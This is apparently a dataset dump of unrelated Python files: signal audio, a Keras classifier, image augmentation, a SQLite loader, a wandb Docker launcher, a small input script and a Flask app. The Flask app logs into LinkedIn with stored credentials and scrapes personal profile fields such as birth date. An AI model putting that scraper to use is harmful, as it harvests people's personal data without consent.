os.environ['DATAMART_VERSION'])\n Profiler()\n asyncio.get_event_loop().run_forever()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"profiler/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":14025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"410401710","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.signal as sc\nimport simpleaudio as sa\n\n# Candida de veces que se repite la señal\nCANTIDAD=10\n\nf = 6000\nfs = 44100\nsec = 1 # Cuantos segundos se quiere reproducir\nB = 5000\nt = np.arange(0,sec,1/fs)\n\n#note = (2**15-1)*np.sin(2 * np.pi * B/2*(t/sec) *t) #sweept\n\n#steps=10\n#note=np.array([])\n#for i in range(steps):\n# note=np.append(note,[(2**15-1)*np.sin(2 * np.pi * B*(i/steps) *t)])\n\n#note = (2**15-1)*np.sin(2 * np.pi * B * t) # Señal senoidal a reproducir\n#note = (2**15-1)*sc.sawtooth(2 * np.pi * f * t) # Señal triangular a reproducir\nnote = (2**15-1)*sc.square(2 * np.pi * f * t) # Señal cuadrada a reproducir\n\n# Grafica la señal\nfig=plt.figure(1)\nplt.plot(t,note)\n##plt.plot(t[0:5*fs//f],note[:5*fs//f])\nplt.show()\n\naudio = note.astype(np.int16) #tranforma la variable note a entero de 16bits y lo guarda en audio\nfor i in range(CANTIDAD):\n play_obj = sa.play_buffer(audio, 1, 2, fs) # sale el audio\n play_obj.wait_done() # espera que termine la linea anterior\n\n","sub_path":"Programas/TP2/linux/audio_gen.py","file_name":"audio_gen.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388761212","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 18 10:21:03 2017\n\n@author: Nott\n\"\"\"\n\n#Artificial Neural Network\n\n#Installing Theano\n#pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\n\n#Installing 
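On the audio snippet above (its comments are Spanish: CANTIDAD is the number of repetitions, and the commented-out lines build a frequency sweep by hand): the manual formula sin(2*pi*(B/2)*(t/sec)*t) has instantaneous frequency B*t/sec, i.e. it ramps to B Hz, and scipy.signal provides chirp for exactly this. A minimal sketch:

import numpy as np
import scipy.signal as sc

fs, sec, B = 44100, 1, 5000
t = np.arange(0, sec, 1 / fs)

# Sketch: linear 0 -> B Hz sweep via scipy's chirp, equivalent in intent
# to the manual formula commented out above.
note = (2 ** 15 - 1) * sc.chirp(t, f0=0, t1=sec, f1=B, method='linear')
audio = note.astype(np.int16)  # 16-bit samples, as simpleaudio expects
print(audio.shape, audio.dtype)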
Tenserflow\n#pip install --upgrade tensorflow\n\n#Install Keras\n#pip install --upgrade keras\n\n#Part 1 - Data Preprocessing\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n \n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\nonehotencoder = OneHotEncoder(categorical_features = [1])\nX = onehotencoder.fit_transform(X).toarray()\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n#Part 2 - Let's make ANN\n\n#Import Keras Libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n#Initialising ANN\nclassifier = Sequential()\n\n#Adding the Input layer and First hidden layers\nclassifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu',input_dim=11))\n\n#Adding Second Hidden Layer\nclassifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu'))\n\n#Adding Output Layer if dependencies param > 2 change output_dim=x and activation=softmax\nclassifier.add(Dense(units=1,kernel_initializer='uniform',activation='sigmoid'))\n\n#Part 3 - Make Prediction and Evaluating the model if dependencies param > 2 change loss='categorical_crossentropy'\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# Fitting ANN to the Training set\nclassifier.fit(X_train, y_train, batch_size=10 ,epochs=100)\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\ny_pred = (y_pred > 0.5)\n\n#Predict new single test\nnew_prediction = classifier.predict(sc.transform(np.array([[0.0,0,600,1,40,3,60000,2,1,1,50000]])))\nnew_prediction = (new_prediction > 0.5)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n\n#Evaluating ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_classifier():\n classifier = Sequential()\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu',input_dim=11))\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu'))\n classifier.add(Dense(units=1,kernel_initializer='uniform',activation='sigmoid'))\n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\nclassifier = KerasClassifier(build_fn = build_classifier, batch_size = 10, epochs = 100)\naccuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10)\nmean = accuracies.mean()\nvariance = accuracies.std()\n\n\n#Improving ANN\n\n#Dropout Regularrizaion to Reduce overfitting if it needed\n\n#Tuning ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom 
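The fit call above always runs the full 100 epochs; Keras's EarlyStopping callback stops training once a monitored metric plateaus. A sketch on toy data -- the random arrays and layer sizes are placeholders, not the churn dataset above:

import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.callbacks import EarlyStopping

# Sketch: stop training once validation loss stops improving, instead of
# always running a fixed 100 epochs. Toy random data stands in for X_train.
X = np.random.rand(200, 11)
y = (np.random.rand(200) > 0.5).astype(int)

model = Sequential()
model.add(Dense(units=6, activation='relu', input_dim=11))
model.add(Dense(units=1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

stopper = EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)
model.fit(X, y, validation_split=0.2, epochs=100, batch_size=10,
          callbacks=[stopper], verbose=0)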
keras.layers import Dense\ndef build_classifier(localOptimizer):\n classifier = Sequential()\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu',input_dim=11))\n classifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu'))\n classifier.add(Dense(units=1,kernel_initializer='uniform',activation='sigmoid'))\n classifier.compile(optimizer= localOptimizer, loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\nclassifier = KerasClassifier(build_fn = build_classifier)\nparameters = {'batch_size' : [25, 32],\n 'epochs' : [100, 500],\n 'localOptimizer' : ['adam', 'rmsprop']}\ngrid_search = GridSearchCV(estimator = classifier,\n param_grid = parameters,\n scoring = 'accuracy',\n cv = 10)\ngrid_search = grid_search.fit(X_train, y_train)\nbest_parameters = grid_search.best_params_\nbeat_accuracy = grid_search.best_score_\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Part 8 - Deep Learning/Section 39 - Artificial Neural Networks (ANN)/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"343435761","text":"import tensorflow as tf\n\n\ndef image_augmentation(image, is_training, crop_h, crop_w):\n\n def _aug_with_train(input_x, crop_height, crop_width):\n img_h, img_w, ch = list(map(int, input_x.get_shape()[:]))\n\n pad_w = int(img_h * 0.2)\n pad_h = int(img_w * 0.2)\n\n input_x = tf.image.resize_image_with_crop_or_pad(input_x, img_h+pad_h, img_w+pad_w)\n input_x = tf.random_crop(input_x, [crop_height, crop_width, ch])\n input_x = tf.image.random_flip_left_right(input_x)\n input_x = tf.image.random_flip_up_down(input_x)\n\n input_x = tf.image.random_contrast(input_x, lower=0.2, upper=2.0)\n input_x = tf.image.random_brightness(input_x, max_delta=63. 
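GridSearchCV above crosses every combination (2 batch sizes x 2 epoch counts x 2 optimizers, each cross-validated 10-fold); scikit-learn's RandomizedSearchCV samples the grid instead, which scales better as parameters are added. A small sketch on a plain sklearn estimator for brevity:

from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import RandomizedSearchCV

# Sketch: sample a parameter grid instead of exhaustively crossing it.
X, y = make_classification(n_samples=200, n_features=11, random_state=0)
search = RandomizedSearchCV(LogisticRegression(max_iter=500),
                            {'C': [0.01, 0.1, 1.0, 10.0]},
                            n_iter=3, cv=5, scoring='accuracy', random_state=0)
search.fit(X, y)
print(search.best_params_, round(search.best_score_, 3))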
/ 255.)\n input_x = tf.image.random_saturation(input_x, lower=0.5, upper=1.8)\n input_x = tf.image.per_image_standardization(input_x)\n return input_x\n\n def _aug_with_test(input_x, crop_height, crop_width):\n\n input_x = tf.image.resize_image_with_crop_or_pad(input_x, crop_height, crop_width)\n input_x = tf.image.per_image_standardization(input_x)\n return input_x\n\n image = tf.cond(is_training,\n lambda: _aug_with_train(image, crop_h, crop_w),\n lambda: _aug_with_test(image, crop_h, crop_w))\n return image\n\n\ndef images_augmentation(images, phase_train):\n with tf.name_scope('augmentation'):\n crop_h, crop_w = list(map(int, images.get_shape()[1:3]))\n images = tf.map_fn(lambda image: image_augmentation(image, phase_train, crop_h, crop_w),\n images)\n return images\n","sub_path":"augmentator.py","file_name":"augmentator.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"300584480","text":"# -*- coding: utf-8 -*-\n\"\"\"\ndata2database\n Load and transfer logsheet, subject dimensions, digitized, and force data\n to database.\n\nThis code will also create a table that records the table names of each cycle.\n\nCreated on Mon Jul 6 08:51:24 2020\n\n@author: cwiens\n\"\"\"\n\nimport sqlite3\nimport pandas as pd\nimport glob, os\n\nfrom codes.importlogsheet import readls\n\n\n\"\"\" set file names \"\"\"\ndb = '../data/wc_graded.sqlite'\nlogsheet = '../data/logsheet_master.xlsx'\nsub_dim_file = '../data/Subject Body Dimensions_Complete2.xlsx'\nwc_adj_file = '../data/wc-adjustments.xlsx'\nresults_file = '../data/DOD_graded_results_CW_200826.xlsx'\n\n\n\"\"\" establish database connection \"\"\"\nconn = sqlite3.connect(db)\n\n\n\"\"\" load master logsheet, subject dimensions, and WC adjustments \"\"\"\nls = readls(logsheet)\nsub_dim = pd.read_excel(sub_dim_file).iloc[:,:-1]\nwc_adj = pd.read_excel(wc_adj_file, sheet_name = 'adj_stats')\nresults = pd.read_excel(results_file)\n\n\n\"\"\" upload logsheet, subject dimensions, WC adjustments, and results files to database \"\"\"\nls.to_sql('logsheet', conn, if_exists='replace', index=False)\nsub_dim.to_sql('subject_dimensions', conn, if_exists='replace', index=False)\nwc_adj.to_sql('wheelchair_adjustments', conn, if_exists='replace', index=False)\nresults.to_sql('results', conn, if_exists='replace', index=False)\n\n\n\"\"\" load digitized and force data \"\"\"\n# intialzie table_data\ntable_data = None\n# change folder to where data is stored\nos.chdir('../data/subject_data')\n# loop through each file\nfor file in glob.glob('*.xlsx'):\n data_digi = pd.read_excel(file).iloc[:,:9]\n data_jointkin = pd.read_excel(file).iloc[:,9:]\n data_angle = pd.read_excel(file, sheet_name = \"Sheet2\")\n data_rf = pd.read_excel(file, sheet_name = \"Sheet3\")\n data_full = pd.read_excel(file, sheet_name = \"Sheet4\")\n # find cycle info\n sub = '{:02}'.format(int(''.join(filter(str.isdigit, file[:7]))))\n sess = ''.join(filter(str.isdigit, file[10:18]))\n cond = ''.join(filter(str.isdigit, file[22:28]))\n trial = '{:02}'.format(int(''.join(filter(str.isdigit, file[28:37]))))\n cycle = '{:02}'.format(int(''.join(filter(str.isdigit, file[36:]))))\n \"\"\" upload all data to database \"\"\"\n data_digi.to_sql('digi_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_jointkin.to_sql('jkin_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_angle.to_sql('angle_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n 
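tf.cond above selects between the training and evaluation augmentation pipelines; both branches must be zero-argument callables, and only the chosen one contributes to the result. A tiny self-contained sketch of the pattern:

import tensorflow as tf

# Sketch: tf.cond picks one of two branch callables from a boolean tensor,
# the same pattern used for the train/eval augmentation above.
x = tf.constant(3.0)
is_training = tf.constant(True)
y = tf.cond(is_training, lambda: x * 2.0, lambda: x + 1.0)
print(y)  # tf.Tensor(6.0, ...) when run eagerly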
data_rf.to_sql('force_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_full.to_sql('fulldata_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n \"\"\" add data info to list of tables \"\"\"\n if table_data is None:\n table_data = pd.DataFrame({'subject_id': [int(sub)],\n 'session': [int(sess)],\n 'condition': [int(cond)],\n 'trial': [int(trial)],\n 'cycle': [int(cycle)],\n 'digi': ['digi_' + sub + sess + cond + trial + cycle],\n 'force': ['force_' + sub + sess + cond + trial + cycle],\n 'angle': ['angle_' + sub + sess + cond + trial + cycle],\n 'fulldata': ['fulldata_' + sub + sess + cond + trial + cycle]})\n else:\n table_data = table_data.append(pd.DataFrame({'subject_id': [int(sub)],\n 'session': [int(sess)],\n 'condition': [int(cond)],\n 'trial': [int(trial)],\n 'cycle': [int(cycle)],\n 'digi': ['digi_' + sub + sess + cond + trial + cycle],\n 'force': ['force_' + sub + sess + cond + trial + cycle],\n 'angle': ['angle_' + sub + sess + cond + trial + cycle],\n 'fulldata': ['fulldata_' + sub + sess + cond + trial + cycle]})).reset_index(drop=True)\n \n# return to original folder\nos.chdir('../..')\n# upload table_data\ntable_data.to_sql('table_list', conn, if_exists='replace', index=False)\n\n\n\"\"\" close connection \"\"\"\nconn.close()\n","sub_path":"codes/data2database.py","file_name":"data2database.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"592352253","text":"import getpass\nimport json\nimport logging\nimport os\nimport posixpath\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom typing import Any, Dict, List, Optional, Sequence, Union\n\n\nfrom docker.models.resource import Model # type: ignore\nfrom dockerpycreds.utils import find_executable # type: ignore\nfrom six.moves import shlex_quote\nimport wandb\nfrom wandb.apis.internal import Api\nfrom wandb.env import DOCKER\nfrom wandb.errors import ExecutionError, LaunchError\nfrom wandb.util import get_module\n\nfrom . import _project_spec\nfrom .utils import _is_wandb_dev_uri, _is_wandb_local_uri\nfrom ..lib.git import GitRepo\n\n_logger = logging.getLogger(__name__)\n\n_GENERATED_DOCKERFILE_NAME = \"Dockerfile.wandb-autogenerated\"\n_PROJECT_TAR_ARCHIVE_NAME = \"wandb-project-docker-build-context\"\n\n\ndef validate_docker_installation() -> None:\n \"\"\"Verify if Docker is installed on host machine.\"\"\"\n if not find_executable(\"docker\"):\n raise ExecutionError(\n \"Could not find Docker executable. 
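The table_data block above grows a DataFrame row by row with DataFrame.append, which copies the frame on every call and has since been deprecated in pandas; collecting plain dicts and constructing the frame once is the usual replacement. A minimal sketch:

import pandas as pd

# Sketch: accumulate rows as dicts and build the DataFrame once at the
# end, instead of DataFrame.append inside the file loop above.
rows = []
for sub, sess, cond, trial, cycle in [('01', '1', '1', '01', '01'),
                                      ('01', '1', '2', '01', '02')]:
    rows.append({'subject_id': int(sub), 'session': int(sess),
                 'condition': int(cond), 'trial': int(trial),
                 'cycle': int(cycle),
                 'digi': 'digi_' + sub + sess + cond + trial + cycle})

table_data = pd.DataFrame(rows)
print(table_data)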
\"\n \"Ensure Docker is installed as per the instructions \"\n \"at https://docs.docker.com/install/overview/.\"\n )\n\n\ndef validate_docker_env(launch_project: _project_spec.LaunchProject) -> None:\n \"\"\"Ensure project has a docker image associated with it.\"\"\"\n if not launch_project.docker_image:\n raise ExecutionError(\n \"LaunchProject with docker environment must specify the docker image \"\n \"to use via 'docker_image' field.\"\n )\n\n\ndef generate_docker_image(\n launch_project: _project_spec.LaunchProject, entry_cmd: str\n) -> str:\n \"\"\"Uses project and entry point to generate the docker image.\"\"\"\n path = launch_project.project_dir\n # this check will always pass since the dir attribute will always be populated\n # by _fetch_project_local\n get_module(\n \"repo2docker\",\n required='wandb launch requires additional dependencies, install with pip install \"wandb[launch]\"',\n )\n assert isinstance(path, str)\n cmd: Sequence[str] = [\n \"jupyter-repo2docker\",\n \"--no-run\",\n \"--user-id={}\".format(launch_project.docker_user_id),\n path,\n '\"{}\"'.format(entry_cmd),\n ]\n\n _logger.info(\n \"Generating docker image from git repo or finding image if it already exists..........\"\n )\n wandb.termlog(\"Generating docker image, this may take a few minutes\")\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stderr = \"\"\n # this will always pass, repo2docker writes to stderr.\n assert process.stderr\n for line in process.stderr:\n decoded_line = line.decode(\"utf-8\")\n if decoded_line.endswith(\"\\n\"):\n decoded_line = decoded_line.rstrip(\"\\n\")\n print(decoded_line) # don't spam termlog with all this\n stderr = stderr + decoded_line\n process.wait()\n image_id: List[str] = re.findall(r\"Successfully tagged (.+):latest\", stderr)\n if not image_id:\n image_id = re.findall(r\"Reusing existing image \\((.+)\\)\", stderr)\n if not image_id:\n raise LaunchError(\"error running repo2docker: {}\".format(stderr))\n os.environ[DOCKER] = image_id[0]\n return image_id[0]\n\n\ndef pull_docker_image(docker_image: str) -> None:\n \"\"\"Pulls the requested docker image.\"\"\"\n import docker # type: ignore\n\n info = docker_image.split(\":\")\n client = docker.from_env()\n try:\n if len(info) == 1:\n client.images.pull(info[0])\n else:\n client.images.pull(info[0], tag=info[1])\n except docker.errors.APIError as e:\n raise LaunchError(\"Docker server returned error: {}\".format(e))\n\n\ndef build_docker_image(\n launch_project: _project_spec.LaunchProject, base_image: str, copy_code: bool,\n) -> Union[Model, Any]:\n \"\"\"Build a docker image containing the project in `work_dir`, using the base image.\n\n Arguments:\n launch_project: LaunchProject class instance\n base_image: base_image to build the docker image off of\n api: instance of wandb.apis.internal Api\n copy_code: boolean indicating if code should be copied into the docker container\n\n Returns:\n A `Model` instance of the docker image.\n\n Raises:\n LaunchError: if there is an issue communicating with the docker client\n \"\"\"\n import docker\n\n image_name = \"wandb_launch_{}\".format(launch_project.run_id)\n image_uri = _get_docker_image_uri(\n name=image_name, work_dir=launch_project.project_dir\n )\n copy_code_line = \"\"\n workdir_line = \"\"\n copy_config_line = \"\"\n workdir = os.path.join(\"/home/\", getpass.getuser())\n if launch_project.override_config:\n copy_config_line = \"COPY {}/{} {}\\n\".format(\n _PROJECT_TAR_ARCHIVE_NAME, _project_spec.DEFAULT_CONFIG_PATH, 
workdir\n )\n if copy_code:\n copy_code_line = \"COPY {}/ {}\\n\".format(_PROJECT_TAR_ARCHIVE_NAME, workdir)\n workdir_line = \"WORKDIR {}\\n\".format(workdir)\n name_line = \"\"\n if launch_project.name:\n name_line = \"ENV WANDB_NAME={wandb_name}\\n\"\n\n dockerfile = (\n \"FROM {imagename}\\n\"\n \"{copy_config_line}\"\n \"{copy_code_line}\"\n \"{workdir_line}\"\n \"{name_line}\"\n ).format(\n imagename=base_image,\n copy_config_line=copy_config_line,\n copy_code_line=copy_code_line,\n workdir_line=workdir_line,\n name_line=name_line,\n )\n build_ctx_path = _create_docker_build_ctx(\n launch_project.project_dir,\n dockerfile,\n launch_project._runtime,\n launch_project.override_config,\n )\n with open(build_ctx_path, \"rb\") as docker_build_ctx:\n _logger.info(\"=== Building docker image %s ===\", image_uri)\n # TODO: replace with shelling out\n dockerfile = posixpath.join(\n _PROJECT_TAR_ARCHIVE_NAME, _GENERATED_DOCKERFILE_NAME\n )\n # TODO: remove the dependency on docker / potentially just do the append builder\n # found at: https://github.com/google/containerregistry/blob/master/client/v2_2/append_.py\n client = docker.from_env()\n try:\n image, _ = client.images.build(\n tag=image_uri,\n forcerm=True,\n dockerfile=dockerfile,\n fileobj=docker_build_ctx,\n custom_context=True,\n encoding=\"gzip\",\n )\n except ConnectionError as e:\n raise LaunchError(\"Error communicating with docker client: {}\".format(e))\n\n try:\n os.remove(build_ctx_path)\n except Exception:\n _logger.info(\n \"Temporary docker context file %s was not deleted.\", build_ctx_path\n )\n return image\n\n\ndef get_docker_command(\n image: Union[Model, Any],\n launch_project: _project_spec.LaunchProject,\n api: Api,\n docker_args: Dict[str, Any] = None,\n) -> List[str]:\n \"\"\"Constructs the docker command using the image and docker args.\n\n Arguments:\n image: a Docker image to be run\n launch_project: an instance of LaunchProject\n api: an instance of wandb.apis.internal Api\n docker_args: a dictionary of additional docker args for the command\n \"\"\"\n docker_path = \"docker\"\n cmd: List[Any] = [docker_path, \"run\", \"--rm\"]\n\n if _is_wandb_local_uri(api.settings(\"base_url\")) and sys.platform == \"darwin\":\n _, _, port = _, _, port = api.settings(\"base_url\").split(\":\")\n base_url = \"http://host.docker.internal:{}\".format(port)\n elif _is_wandb_dev_uri(api.settings(\"base_url\")):\n base_url = \"http://host.docker.internal:9002\"\n else:\n base_url = api.settings(\"base_url\")\n\n cmd += [\n \"--env\",\n f\"WANDB_BASE_URL={base_url}\",\n \"--env\",\n f\"WANDB_API_KEY={api.api_key}\",\n \"--env\",\n f\"WANDB_PROJECT={launch_project.target_project}\",\n \"--env\",\n f\"WANDB_ENTITY={launch_project.target_entity}\",\n \"--env\",\n f\"WANDB_LAUNCH={True}\",\n \"--env\",\n f\"WANDB_LAUNCH_CONFIG_PATH={_project_spec.DEFAULT_CONFIG_PATH}\",\n \"--env\",\n f\"WANDB_RUN_ID={launch_project.run_id or None}\",\n \"--env\",\n f\"WANDB_DOCKER={launch_project.docker_image}\",\n ]\n\n if docker_args:\n for name, value in docker_args.items():\n # Passed just the name as boolean flag\n if isinstance(value, bool) and value:\n if len(name) == 1:\n cmd += [\"-\" + name]\n else:\n cmd += [\"--\" + name]\n else:\n # Passed name=value\n if len(name) == 1:\n cmd += [\"-\" + name, value]\n else:\n cmd += [\"--\" + name, value]\n\n cmd += [image.tags[0]]\n return [shlex_quote(c) for c in cmd]\n\n\ndef _get_docker_image_uri(name: str, work_dir: str) -> str:\n \"\"\"Returns a Docker image URI based on the git hash of the 
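get_docker_command above appends each environment variable as its own ['--env', 'KEY=value'] pair; expressing that over a dict keeps the variable list in one place. A sketch, with the standard library's shlex.quote standing in for six's shlex_quote used above:

import shlex

# Sketch: build the repeated ['--env', 'KEY=value'] pairs above from a dict.
def env_flags(env):
    flags = []
    for key, value in env.items():
        flags += ['--env', '{}={}'.format(key, value)]
    return flags

cmd = ['docker', 'run', '--rm'] + env_flags({'WANDB_PROJECT': 'demo', 'WANDB_LAUNCH': True})
print(' '.join(shlex.quote(c) for c in cmd))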
specified working directory.\n\n Arguments:\n name: The URI of the Docker repository with which to tag the image. The\n repository URI is used as the prefix of the image URI.\n work_dir: Path to the working directory in which to search for a git commit hash\n \"\"\"\n name = name.replace(\" \", \"-\") if name else \"docker-project\"\n # Optionally include first 7 digits of git SHA in tag name, if available.\n\n git_commit = GitRepo(work_dir).last_commit\n version_string = \":\" + str(git_commit[:7]) if git_commit else \"\"\n return name + version_string\n\n\ndef _create_docker_build_ctx(\n work_dir: str,\n dockerfile_contents: str,\n runtime: Optional[str],\n run_config: Dict[str, Any],\n) -> str:\n \"\"\"Creates build context tarfile containing Dockerfile and project code, returning path to tarfile.\"\"\"\n directory = tempfile.mkdtemp()\n try:\n dst_path = os.path.join(directory, \"wandb-project-contents\")\n shutil.copytree(src=work_dir, dst=dst_path)\n if run_config:\n config_path = os.path.join(dst_path, _project_spec.DEFAULT_CONFIG_PATH)\n with open(config_path, \"w\") as fp:\n json.dump(run_config, fp)\n if runtime:\n runtime_path = os.path.join(dst_path, \"runtime.txt\")\n with open(runtime_path, \"w\") as fp:\n fp.write(runtime)\n\n with open(os.path.join(dst_path, _GENERATED_DOCKERFILE_NAME), \"w\") as handle:\n handle.write(dockerfile_contents)\n _, result_path = tempfile.mkstemp()\n wandb.util.make_tarfile(\n output_filename=result_path,\n source_dir=dst_path,\n archive_name=_PROJECT_TAR_ARCHIVE_NAME,\n )\n finally:\n shutil.rmtree(directory)\n return result_path\n","sub_path":"wandb/sdk/launch/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"538149585","text":"def solicitaInteiro(iterator):\n valor = \"Digite \" + str(iterator) + \"º número: \" \n num = input(valor)\n try:\n num = int(num)\n valor = \"O \" + str(iterator) + \"º número informado foi [\"\n print(valor, num, \"]\")\n return num\n except:\n print(\"Não é um número válido.\")\n exit()\n\nquantidade = [1,2]\nvalor = 0\nfor iterator in quantidade:\n valor += solicitaInteiro(iterator)\n\nprint(\"Soma:\", valor)","sub_path":"semana1/estrutura-sequencial/exercicio03.py","file_name":"exercicio03.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299974633","text":"from flask import Flask, request, jsonify,render_template\n\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pickle\n\nimport json\nimport os\nfrom os import path\nimport re\n\n\nLINKEDIN_MAIL = os.environ.get(\"LINKEDIN_MAIL\")\nLINKEDIN_PASSWORD = os.environ.get(\"LINKEDIN_PASSWORD\")\n\napp = Flask(__name__)\n\n\nSERVER_ERROR = [{\"server-error\":\"can't establish connection ,try again, after some time\"}]\nSERVER_ERROR_DATA = [{\"server-error\":\"failed to fetch data, try again, after some time\"}]\ndef save_cookies(requests_cookiejar):\n filename='cookies'\n with open(filename, 'wb') as f:\n pickle.dump(requests_cookiejar, f)\n\ndef load_cookies(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\ndef login_linkedin():\n client = requests.Session()\n HOMEPAGE_URL = 'https://www.linkedin.com'\n LOGIN_URL = 'https://www.linkedin.com/uas/login-submit'\n html = client.get(HOMEPAGE_URL).content\n soup = BeautifulSoup(html, \"html.parser\")\n try:\n csrf = soup.find('input', 
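The small prompt script above is Portuguese: solicitaInteiro asks for the i-th number ('Digite ... número'), echoes what was entered, and exits the whole program on invalid input. An English sketch that re-prompts instead of exiting:

# Sketch: English re-prompting variant of solicitaInteiro above -- keep
# asking until the user enters a valid integer instead of calling exit().
def ask_integer(i):
    while True:
        raw = input('Enter number {}: '.format(i))
        try:
            return int(raw)
        except ValueError:
            print('Not a valid integer, try again.')

if __name__ == '__main__':
    total = sum(ask_integer(i) for i in (1, 2))
    print('Sum:', total)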
dict(name='loginCsrfParam'))['value']\n except:\n return \"csrf :error\"\n\n try:\n login_information = {\n 'session_key':LINKEDIN_MAIL,\n 'session_password':LINKEDIN_PASSWORD,\n 'loginCsrfParam': csrf,\n }\n client.post(LOGIN_URL, data=login_information)\n save_cookies(client.cookies)\n except:\n return \"login:error\"\n return \"success\"\n\ndef scrapper(link,user_req_data):\n if not path.exists('cookies'):\n login = login_linkedin()\n if login == \"success\":\n pass\n else:\n print(\"Linkedin : Failed to Login\")\n return(SERVER_ERROR)\n url = link\n html = requests.get(url,cookies=load_cookies('cookies'))\n if not html.status_code == 200:\n login = login_linkedin()\n html = requests.get(url,cookies=load_cookies('cookies'))\n if not login == \"success\" or not html.status_code == 200:\n return(SERVER_ERROR)\n soup = BeautifulSoup(html.content , \"html.parser\")\n data = soup.find_all('code')\n if data == []:\n return(SERVER_ERROR_DATA)\n found = False\n req_data = {}\n for element in data:\n json_object = element.get_text()\n try:\n dict_from_json = json.loads(json_object)\n if 'included' in dict_from_json.keys():\n for values in dict_from_json['included']:\n if 'birthDateOn' in values.keys():\n found = True\n req_data = values\n break\n if found:\n break\n except:\n pass\n\n resp = [{}]\n if found:\n try:\n resp = [{\n user_req_data : req_data[user_req_data]\n }]\n except:\n pass\n return resp\n\n@app.route('/api/v1/linkedin/', methods=('GET', 'POST'))\ndef respond():\n if request.method == 'POST':\n req_data = request.form['data']\n link = request.form['url']\n link_regex = re.compile('((http(s?)://)*([a-zA-Z0-9\\-])*\\.|[linkedin])[linkedin/~\\-]+\\.[a-zA-Z0-9/~\\-_,&=\\?\\.;]+[^\\.,\\s<]')\n validate = link_regex.match(link)\n if validate is None:\n resp = [{\n \"invalid_link\" : link + \"- please check your link one more time and try agian\"\n }]\n return jsonify(resp)\n resp = scrapper(link,req_data)\n if resp == [{}]:\n resp = [{\n \"No requested data found\" : req_data + \"- please try again with the keywords headline/firstName/lastName/summary\"\n }]\n return jsonify(resp)\n\n return render_template('api.html')\n\n\n\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)\n","sub_path":"local/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571299809","text":"__author__ = 'clarksj4 & 